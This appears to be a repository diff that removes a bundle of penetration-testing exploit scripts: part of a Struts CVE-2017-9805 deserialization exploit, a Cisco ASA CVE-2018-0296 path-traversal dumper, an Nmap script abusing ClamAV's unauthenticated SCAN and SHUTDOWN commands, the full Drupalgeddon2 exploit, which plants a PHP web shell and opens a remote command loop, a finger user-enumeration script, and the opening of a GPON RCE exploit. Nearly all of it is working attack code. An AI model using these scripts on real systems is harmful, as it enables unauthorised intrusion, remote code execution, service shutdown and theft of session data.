||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
"""
|
||||
headers = {
|
||||
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
|
||||
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
|
||||
'Referer': str(url),
|
||||
'Content-Type': 'application/xml',
|
||||
'Accept': '*/*'
|
||||
}
|
||||
|
||||
timeout = 8
|
||||
try:
|
||||
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
|
||||
# if the response returned before the request timeout.
|
||||
# then, the host should not be vulnerable.
|
||||
# The request should return > 10 seconds, while the timeout is 8.
|
||||
result = False
|
||||
except Exception:
|
||||
result = True
|
||||
return(result)
|
||||
|
||||
|
||||
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
|
||||
if url:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
if usedlist:
|
||||
URLs_List = []
|
||||
try:
|
||||
f_file = open(str(usedlist), 'r')
|
||||
URLs_List = f_file.read().replace('\r', '').split('\n')
|
||||
try:
|
||||
URLs_List.remove('')
|
||||
except ValueError:
|
||||
pass
|
||||
f_file.close()
|
||||
except Exception as e:
|
||||
print('Error: There was an error in reading list file.')
|
||||
print("Exception: " + str(e))
|
||||
exit(1)
|
||||
for url in URLs_List:
|
||||
if not do_exploit:
|
||||
result = check(url)
|
||||
output = '[*] Status: '
|
||||
if result is True:
|
||||
output += 'Vulnerable!'
|
||||
else:
|
||||
output += 'Not Affected.'
|
||||
print(output)
|
||||
else:
|
||||
exploit(url, cmd)
|
||||
print("[$] Request sent.")
|
||||
print("[.] If the host is vulnerable, the command will be executed in the background.")
|
||||
|
||||
print('[%] Done.')
|
||||
|
||||
if __name__ == '__main__':
|
||||
try:
|
||||
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
|
||||
except KeyboardInterrupt:
|
||||
print('\nKeyboardInterrupt Detected.')
|
||||
print('Exiting...')
|
||||
exit(0)
|
||||
|
|
@ -1,61 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import urlparse
|
||||
import os
|
||||
|
||||
print("""
|
||||
_____ _____ _____ _____ _____ ___ _____ ___
|
||||
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
|
||||
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
|
||||
| | | | `--. \ | | | | | | _ | `--. \ _ |
|
||||
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
|
||||
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
|
||||
|
||||
______ _ _ _____ _
|
||||
| ___ \ | | | | |_ _| | |
|
||||
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
|
||||
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
|
||||
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
|
||||
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
|
||||
|
||||
CVE-2018-0296
|
||||
Script author: Yassine Aboukir(@yassineaboukir)
|
||||
""")
|
||||
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
|
||||
url = sys.argv[1]
|
||||
|
||||
dir_path = os.path.dirname(os.path.realpath(__file__))
|
||||
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
|
||||
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
|
||||
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
|
||||
logon = "/+CSCOE+/logon.html"
|
||||
|
||||
try:
|
||||
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if "webvpnLang" in is_cisco_asa.cookies:
|
||||
try:
|
||||
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
|
||||
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
|
||||
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
|
||||
|
||||
except requests.exceptions.RequestException as e:
|
||||
print(e)
|
||||
sys.exit(1)
|
||||
|
||||
if str(filelist_r.status_code) == "200":
|
||||
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
|
||||
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
|
||||
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
|
||||
else: print("Not vulnerable!")
|
||||
else:
|
||||
print("This is not Cisco ASA! E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
|
||||
sys.exit(1)
|
||||
|
||||
|
|
@ -1,243 +0,0 @@
|
|||
local shortport = require "shortport"
|
||||
local vulns = require "vulns"
|
||||
local nmap = require "nmap"
|
||||
local stdnse = require "stdnse"
|
||||
local table = require "table"
|
||||
local io = require "io"
|
||||
local string = require "string"
|
||||
|
||||
description = [[
|
||||
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
|
||||
|
||||
ClamAV server 0.99.2, and possibly other previous versions, allow the execution
|
||||
of dangerous service commands without authentication. Specifically, the command 'SCAN'
|
||||
may be used to list system files and the command 'SHUTDOWN' shut downs the
|
||||
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
|
||||
|
||||
This script without arguments test the availability of the command 'SCAN'.
|
||||
|
||||
Reference:
|
||||
* https://twitter.com/nitr0usmx/status/740673507684679680
|
||||
* https://bugzilla.clamav.net/show_bug.cgi?id=11585
|
||||
]]
|
||||
|
||||
---
|
||||
-- @usage
|
||||
-- nmap -sV --script clamav-exec <target>
|
||||
-- nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>
|
||||
-- nmap --script clamav-exec --script-args cmd='shutdown' <target>
|
||||
--
|
||||
-- @output
|
||||
-- PORT STATE SERVICE VERSION
|
||||
-- 3310/tcp open clam ClamAV 0.99.2 (21714)
|
||||
-- | clamav-exec:
|
||||
-- | VULNERABLE:
|
||||
-- | ClamAV Remote Command Execution
|
||||
-- | State: VULNERABLE
|
||||
-- | ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
|
||||
-- | clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'
|
||||
-- | may be used to enumerate system files and the command 'SHUTDOWN' shut downs the
|
||||
-- | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
|
||||
-- |
|
||||
-- | Disclosure date: 2016-06-8
|
||||
-- | Extra information:
|
||||
-- | SCAN command is enabled.
|
||||
-- | References:
|
||||
-- | https://bugzilla.clamav.net/show_bug.cgi?id=11585
|
||||
-- |_ https://twitter.com/nitr0usmx/status/740673507684679680
|
||||
-- @xmloutput
|
||||
-- <table key="NMAP-1">
|
||||
-- <elem key="title">ClamAV Remote Command Execution</elem>
|
||||
-- <elem key="state">VULNERABLE</elem>
|
||||
-- <table key="description">
|
||||
-- <elem>ClamAV 0.99.2, and possibly other previous versions, allow the execution
|
||||
-- of the 
clamav commands SCAN and SHUTDOWN without authentication.
|
||||
-- The command 'SCAN' 
may be used to enumerate system files and
|
||||
-- the command 'SHUTDOWN' shut downs the 
service.
|
||||
-- This vulnerability was discovered by Alejandro Hernandez (nitr0us).
</elem>
|
||||
-- </table>
|
||||
-- <table key="dates">
|
||||
-- <table key="disclosure">
|
||||
-- <elem key="year">2016</elem>
|
||||
-- <elem key="day">8</elem>
|
||||
-- <elem key="month">06</elem>
|
||||
-- </table>
|
||||
-- </table>
|
||||
-- <elem key="disclosure">2016-06-8</elem>
|
||||
-- <table key="extra_info">
|
||||
-- <elem>SCAN command is enabled.</elem>
|
||||
-- </table>
|
||||
-- <table key="refs">
|
||||
-- <elem>https://bugzilla.clamav.net/show_bug.cgi?id=11585</elem>
|
||||
-- <elem>https://twitter.com/nitr0usmx/status/740673507684679680</elem>
|
||||
-- </table>
|
||||
-- </table>
|
||||
--
|
||||
-- @args clamav-exec.cmd Command to execute. Option: scan and shutdown
|
||||
-- @args clamav-exec.scandb Database to file list.
|
||||
---
|
||||
|
||||
author = "Paulino Calderon <calderon()websec.mx>"
|
||||
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
|
||||
categories = {"exploit", "vuln"}
|
||||
|
||||
portrule = shortport.port_or_service{3310, "clam"}
|
||||
|
||||
local function shutdown(host, port)
|
||||
local s = nmap.new_socket()
|
||||
local status, err = s:connect(host, port)
|
||||
if not status then
|
||||
stdnse.debug1("Failed to connect")
|
||||
return nil
|
||||
end
|
||||
status, err = s:send("SHUTDOWN")
|
||||
if not status then
|
||||
stdnse.debug1("Failed to send SHUTDOWN command")
|
||||
return nil
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
---
|
||||
-- scan(host, port, file)
|
||||
-- Sends SCAN %FILE command to clamav.
|
||||
-- If no file is specified, we query a non existing file to check the response.
|
||||
--
|
||||
local function scan(host, port, file)
|
||||
local data
|
||||
local s = nmap.new_socket()
|
||||
local status, err = s:connect(host, port)
|
||||
if not status then
|
||||
stdnse.debug1("Failed to connect")
|
||||
return nil
|
||||
end
|
||||
|
||||
if not file then
|
||||
status, err = s:send("SCAN /trinity/loves/nmap")
|
||||
if not status then
|
||||
stdnse.debug1("Failed to send SCAN command")
|
||||
return nil
|
||||
end
|
||||
|
||||
status, data = s:receive()
|
||||
if status and data:match("No such file") then
|
||||
stdnse.debug1("SCAN command enabled")
|
||||
return true, nil
|
||||
end
|
||||
else
|
||||
status, err = s:send(string.format("SCAN %s", file))
|
||||
if not status then
|
||||
stdnse.debug1("Failed to send 'SCAN %s' command", file)
|
||||
return nil
|
||||
end
|
||||
status, data = s:receive()
|
||||
if status then
|
||||
if data:match("OK") then
|
||||
stdnse.debug1("File '%s' exists", file)
|
||||
return true, true
|
||||
else
|
||||
stdnse.debug1("File '%s' does not exists", file)
|
||||
return true, nil
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
local function check_clam(host, port)
|
||||
local s = nmap.new_socket()
|
||||
local status, err = s:connect(host, port)
|
||||
if not status then
|
||||
stdnse.debug1("Failed to connect")
|
||||
return nil
|
||||
end
|
||||
status, err = s:send("PING")
|
||||
if not status then
|
||||
stdnse.debug1("Failed to send PING command")
|
||||
return nil
|
||||
end
|
||||
local data
|
||||
status, data = s:receive()
|
||||
if status and data:match("PONG") then
|
||||
stdnse.debug1("PONG response received")
|
||||
return true
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
||||
action = function(host, port)
|
||||
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
|
||||
local scandb = stdnse.get_script_args(SCRIPT_NAME..".scandb") or nil
|
||||
|
||||
if cmd == "scan" and not scandb then
|
||||
return "The argument 'scandb' must be set if we are using the command 'SCAN'"
|
||||
end
|
||||
|
||||
--Check the service and update the port table
|
||||
local clamchk = check_clam(host, port)
|
||||
if clamchk then
|
||||
stdnse.debug1("ClamAV daemon found")
|
||||
port.version.name = "clam"
|
||||
port.version.product = "ClamAV"
|
||||
nmap.set_port_version(host, port)
|
||||
end
|
||||
|
||||
local vuln = {
|
||||
title = 'ClamAV Remote Command Execution',
|
||||
state = vulns.STATE.NOT_VULN,
|
||||
description = [[
|
||||
ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
|
||||
clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'
|
||||
may be used to enumerate system files and the command 'SHUTDOWN' shut downs the
|
||||
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
|
||||
]],
|
||||
references = {
|
||||
'https://bugzilla.clamav.net/show_bug.cgi?id=11585',
|
||||
'https://twitter.com/nitr0usmx/status/740673507684679680'
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2016', month = '06', day = '8'},
|
||||
},
|
||||
}
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
local status, files = nil
|
||||
|
||||
if cmd == "scan" then
|
||||
local file = io.open(scandb, "r")
|
||||
if not file then
|
||||
stdnse.debug1("Couldn't open file '%s'", scandb)
|
||||
return nil
|
||||
end
|
||||
local files = {}
|
||||
local exists
|
||||
while true do
|
||||
local db_line = file:read()
|
||||
if not db_line then
|
||||
break
|
||||
end
|
||||
status, exists = scan(host, port, db_line)
|
||||
if status and exists then
|
||||
table.insert(files, string.format("%s - FOUND!", db_line))
|
||||
end
|
||||
end
|
||||
if #files > 0 then
|
||||
vuln.extra_info = stdnse.format_output(true, files)
|
||||
vuln.state = vulns.STATE.VULN
|
||||
end
|
||||
elseif cmd == "shutdown" then
|
||||
status = shutdown(host, port)
|
||||
if status then
|
||||
vuln.extra_info = "SHUTDOWN command sent succesfully."
|
||||
vuln.state = vulns.STATE.VULN
|
||||
end
|
||||
else
|
||||
status, files = scan(host, port, nil)
|
||||
if status then
|
||||
vuln.extra_info = "SCAN command is enabled."
|
||||
vuln.state = vulns.STATE.VULN
|
||||
end
|
||||
end
|
||||
|
||||
return vuln_report:make_output(vuln)
|
||||
end
|
||||
BIN
bin/dnsdict6
BIN
bin/dnsdict6
Binary file not shown.
|
|
@ -1,364 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
|
||||
#
|
||||
# Authors:
|
||||
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
|
||||
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
|
||||
#
|
||||
|
||||
|
||||
require "base64"
|
||||
require "json"
|
||||
require "net/http"
|
||||
require "openssl"
|
||||
require "readline"
|
||||
|
||||
|
||||
# Settings - Proxy information (nil to disable)
|
||||
proxy_addr = nil
|
||||
proxy_port = 8080
|
||||
|
||||
|
||||
# Settings - General
|
||||
$useragent = "drupalgeddon2"
|
||||
webshell = "s.php"
|
||||
writeshell = true
|
||||
|
||||
|
||||
# Settings - Payload (we could just be happy without this, but we can do better!)
|
||||
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
|
||||
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Function http_request <url> [type] [data]
|
||||
def http_request(url, type="post", payload="")
|
||||
uri = URI(url)
|
||||
request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
|
||||
request.initialize_http_header({"User-Agent" => $useragent})
|
||||
request.body = payload
|
||||
return $http.request(request)
|
||||
end
|
||||
|
||||
|
||||
# Function gen_evil_url <cmd> [shell]
|
||||
def gen_evil_url(evil, shell=false)
|
||||
# PHP function to use (don't forget about disabled functions...)
|
||||
#phpfunction = $drupalverion.start_with?("8")? "exec" : "passthru"
|
||||
phpfunction = "passthru"
|
||||
|
||||
#puts "[i] PHP cmd: #{phpfunction}" if shell
|
||||
puts "[i] Payload: #{evil}" if not shell
|
||||
|
||||
## Check the version to match the payload
|
||||
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
|
||||
if $drupalverion.start_with?("8")
|
||||
# Method #1 - Drupal 8, mail, #post_render - response is 200
|
||||
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
|
||||
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
|
||||
|
||||
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
|
||||
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
|
||||
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
|
||||
elsif $drupalverion.start_with?("7")
|
||||
# Method #3 - Drupal 7, name, #post_render - response is 200
|
||||
url = $target + "?q=user/password&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
|
||||
payload = "form_id=user_pass&_triggering_element_name=name"
|
||||
else
|
||||
puts "[!] Unsupported Drupal version"
|
||||
exit
|
||||
end
|
||||
|
||||
# Drupal v7.x needs an extra value from a form
|
||||
if $drupalverion.start_with?("7")
|
||||
response = http_request(url, "post", payload)
|
||||
|
||||
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
|
||||
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
|
||||
|
||||
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
|
||||
payload = "form_build_id=" + form_build_id
|
||||
end
|
||||
|
||||
return url, payload
|
||||
end
|
||||
|
||||
|
||||
# Function clean_result <input>
|
||||
def clean_result(input)
|
||||
#result = JSON.pretty_generate(JSON[response.body])
|
||||
#result = $drupalverion.start_with?("8")? JSON.parse(input)[0]["data"] : input
|
||||
result = input
|
||||
#result.slice!(/^\[{"command":".*}\]$/)
|
||||
result.slice!(/\[{"command":".*}\]$/)
|
||||
return result
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Quick how to use
|
||||
if ARGV.empty?
|
||||
puts "Usage: ruby drupalggedon2.rb <target>"
|
||||
puts " ruby drupalgeddon2.rb https://example.com"
|
||||
exit
|
||||
end
|
||||
# Read in values
|
||||
$target = ARGV[0]
|
||||
|
||||
|
||||
# Check input for protocol
|
||||
if not $target.start_with?("http")
|
||||
$target = "http://#{$target}"
|
||||
end
|
||||
# Check input for the end
|
||||
if not $target.end_with?("/")
|
||||
$target += "/"
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Banner
|
||||
puts "[*] --==[::#Drupalggedon2::]==--"
|
||||
puts "-"*80
|
||||
puts "[i] Target : #{$target}"
|
||||
puts "[i] Proxy : #{proxy_addr}:#{proxy_port}" if not proxy_addr.nil?
|
||||
puts "[i] Write? : Skipping writing web shell" if not writeshell
|
||||
puts "-"*80
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Setup connection
|
||||
uri = URI($target)
|
||||
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
|
||||
|
||||
|
||||
# Use SSL/TLS if needed
|
||||
if uri.scheme == "https"
|
||||
$http.use_ssl = true
|
||||
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
|
||||
end
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
# Try and get version
|
||||
$drupalverion = nil
|
||||
# Possible URLs
|
||||
url = [
|
||||
# Drupal 6 / 7 / 8
|
||||
$target + "CHANGELOG.txt",
|
||||
$target + "core/CHANGELOG.txt",
|
||||
# Drupal 6+7 / 8
|
||||
$target + "includes/bootstrap.inc",
|
||||
$target + "core/includes/bootstrap.inc",
|
||||
# Drupal 6 / 7 / 8
|
||||
$target + "includes/database.inc",
|
||||
#$target + "includes/database/database.inc",
|
||||
#$target + "core/includes/database.inc",
|
||||
]
|
||||
# Check all
|
||||
url.each do|uri|
|
||||
# Check response
|
||||
response = http_request(uri, "get")
|
||||
|
||||
if response.code == "200"
|
||||
puts "[+] Found : #{uri} (HTTP Response: #{response.code})"
|
||||
|
||||
# Patched already?
|
||||
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
|
||||
|
||||
# Try and get version from the file contents
|
||||
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
|
||||
|
||||
# If not, try and get it from the URL (In theory, these will never trigger/work as they will be HTTP 403)
|
||||
$drupalverion = uri.match(/includes\/database.inc/)? "6.x" : nil if $drupalverion.empty?
|
||||
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.nil?
|
||||
|
||||
# Done!
|
||||
break
|
||||
elsif response.code == "403"
|
||||
puts "[+] Found : #{uri} (HTTP Response: #{response.code})"
|
||||
|
||||
# Get version from URL
|
||||
$drupalverion = uri.match(/includes\/database.inc/)? "6.x" : nil
|
||||
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.nil?
|
||||
else
|
||||
puts "[!] MISSING: #{uri} (HTTP Response: #{response.code})"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Feedback
|
||||
if $drupalverion
|
||||
status = $drupalverion.end_with?("x")? "?" : "!"
|
||||
puts "[+] Drupal#{status}: v#{$drupalverion}"
|
||||
else
|
||||
puts "[!] Didn't detect Drupal version"
|
||||
exit
|
||||
end
|
||||
if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
|
||||
puts "[!] Unsupported Drupal version"
|
||||
exit
|
||||
end
|
||||
puts "-"*80
|
||||
|
||||
|
||||
|
||||
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
|
||||
|
||||
# Make a request, testing code execution
|
||||
puts "[*] Testing: Code Execution"
|
||||
# Generate a random string to see if we can echo it
|
||||
random = (0...8).map { (65 + rand(26)).chr }.join
|
||||
url, payload = gen_evil_url("echo #{random}")
|
||||
response = http_request(url, "post", payload)
|
||||
if response.code == "200" and not response.body.empty?
|
||||
result = clean_result(response.body)
|
||||
if not result.empty?
|
||||
puts "[+] Result : #{result}"
|
||||
|
||||
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[!] WARNING: Target might to be exploitable [1]... Detected output, but didn't match expected result"
|
||||
else
|
||||
puts "[!] WARNING: Target might to be exploitable [2]... Didn't detect any output (disabled PHP function?)"
|
||||
end
|
||||
else
|
||||
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
|
||||
exit
|
||||
end
|
||||
puts "-"*80
|
||||
|
||||
|
||||
# Location of web shell & used to signal if using PHP shell
|
||||
webshellpath = nil
|
||||
prompt = "drupalgeddon2"
|
||||
# Possibles paths to try
|
||||
paths = [
|
||||
# Web root
|
||||
"",
|
||||
# Required for setup
|
||||
"sites/default/",
|
||||
"sites/default/files/",
|
||||
# They did something "wrong", chmod -R 0777 .
|
||||
#"core/",
|
||||
]
|
||||
# Check all (if doing web shell)
|
||||
paths.each do|path|
|
||||
folder = path.empty? ? "./" : path
|
||||
puts "[*] Testing: Writing To Web Root (#{folder})"
|
||||
|
||||
# Merge locations
|
||||
webshellpath = "#{path}#{webshell}"
|
||||
|
||||
# Final command to execute
|
||||
cmd = "#{bashcmd} | tee #{webshellpath}"
|
||||
|
||||
|
||||
# By default, Drupal v7.x disables the PHP engine entirely in: ./sites/default/files/.htaccess
|
||||
# ...however Drupal v8.x disables the PHP engine using: ./.htaccess
|
||||
if path == "sites/default/files/"
|
||||
puts "[i] Moving : ./sites/default/files/.htaccess"
|
||||
cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
|
||||
end
|
||||
|
||||
# Generate evil URLs
|
||||
url, payload = gen_evil_url(cmd)
|
||||
# Make the request
|
||||
response = http_request(url, "post", payload)
|
||||
# Check result
|
||||
if response.code == "200" and not response.body.empty?
|
||||
# Feedback
|
||||
result = clean_result(response.body)
|
||||
puts "[+] Result : #{result}" if not response.body.empty?
|
||||
|
||||
# Test to see if backdoor is there (if we managed to write it)
|
||||
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname")
|
||||
if response.code == "200" and not response.body.empty?
|
||||
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
|
||||
break
|
||||
elsif response.code == "403"
|
||||
puts "[!] Target is NOT exploitable for some reason [1] (HTTP Response: #{response.code})... May not be able to execute PHP from here?"
|
||||
elsif response.code == "404"
|
||||
puts "[!] Target is NOT exploitable for some reason [2] (HTTP Response: #{response.code})... Might not have write access?"
|
||||
elsif response.body.empty?
|
||||
puts "[!] Target is NOT exploitable for some reason [3] (HTTP Response: #{response.code})... Got an empty response back"
|
||||
else
|
||||
puts "[!] Target is NOT exploitable for some reason [4] (HTTP Response: #{response.code})"
|
||||
end
|
||||
elsif response.code == "403"
|
||||
puts "[!] Target is NOT exploitable for some reason [5] (HTTP Response: #{response.code})... May not be able to execute PHP from here?"
|
||||
elsif response.code == "404"
|
||||
puts "[!] Target is NOT exploitable for some reason [6] (HTTP Response: #{response.code})... Might not have write access?"
|
||||
elsif response.body.empty?
|
||||
puts "[!] Target is NOT exploitable for some reason [7] (HTTP Response: #{response.code}))... Got an empty response back"
|
||||
else
|
||||
puts "[!] Target is NOT exploitable for some reason [8] (HTTP Response: #{response.code})"
|
||||
end
|
||||
webshellpath = nil
|
||||
|
||||
puts "- "*40 if path != paths.last
|
||||
end if writeshell
|
||||
|
||||
# If a web path was set, we exploited using PHP!
|
||||
if webshellpath
|
||||
# Get hostname for the prompt
|
||||
prompt = response.body.to_s.strip
|
||||
|
||||
# Feedback
|
||||
puts "-"*80
|
||||
puts "[i] Fake shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'"
|
||||
# Should we be trying to call commands via PHP?
|
||||
elsif writeshell
|
||||
puts "[!] FAILED: Couldn't find writeable web path"
|
||||
puts "-"*80
|
||||
puts "[*] Dropping back direct commands"
|
||||
end
|
||||
|
||||
|
||||
# Stop any CTRL + C action ;)
|
||||
trap("INT", "SIG_IGN")
|
||||
|
||||
|
||||
# Forever loop
|
||||
loop do
|
||||
# Default value
|
||||
result = "~ERROR~"
|
||||
|
||||
# Get input
|
||||
command = Readline.readline("#{prompt}>> ", true).to_s
|
||||
|
||||
# Exit
|
||||
break if command =~ /exit/
|
||||
|
||||
# Blank link?
|
||||
next if command.empty?
|
||||
|
||||
# If PHP shell
|
||||
if webshellpath
|
||||
# Send request
|
||||
result = http_request("#{$target}#{webshell}", "post", "c=#{command}").body
|
||||
# Direct commands
|
||||
else
|
||||
url, payload = gen_evil_url(command, true)
|
||||
response = http_request(url, "post", payload)
|
||||
|
||||
# Check result
|
||||
if response.code == "200" and not response.body.empty?
|
||||
result = clean_result(response.body)
|
||||
end
|
||||
end
|
||||
|
||||
# Feedback
|
||||
puts result
|
||||
end
|
||||
|
|
@ -1,30 +0,0 @@
|
|||
#!/bin/bash
|
||||
# fingertool - This script will enumerate users using finger
|
||||
# SECFORCE - Antonio Quina
|
||||
|
||||
if [ $# -eq 0 ]
|
||||
then
|
||||
echo "Usage: $0 <IP> [<WORDLIST>]"
|
||||
echo "eg: $0 10.10.10.10 users.txt"
|
||||
exit
|
||||
else
|
||||
IP="$1"
|
||||
fi
|
||||
|
||||
if [ "$2" == "" ]
|
||||
then
|
||||
WORDLIST="/usr/share/metasploit-framework/data/wordlists/unix_users.txt"
|
||||
else
|
||||
WORDLIST="$2"
|
||||
fi
|
||||
|
||||
|
||||
for username in $(cat $WORDLIST | sort -u| uniq)
|
||||
do output=$(finger -l $username@$IP)
|
||||
if [[ $output == *"Directory"* ]]
|
||||
then
|
||||
echo "Found user: $username"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Finished!"
|
||||
|
|
@ -1,78 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import sys
|
||||
import requests
|
||||
import time
|
||||
import urllib2
|
||||
import re
|
||||
import ssl
|
||||
|
||||
ctx = ssl.create_default_context()
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
|
||||
|
||||
def banner():
|
||||
ascii_art = """
|
||||
|
||||
________________________________________________________________
|
||||
|
||||
[*] GPON Remote Code Execution (CVE-2018-10562) [*]
|
||||
________________________________________________________________
|
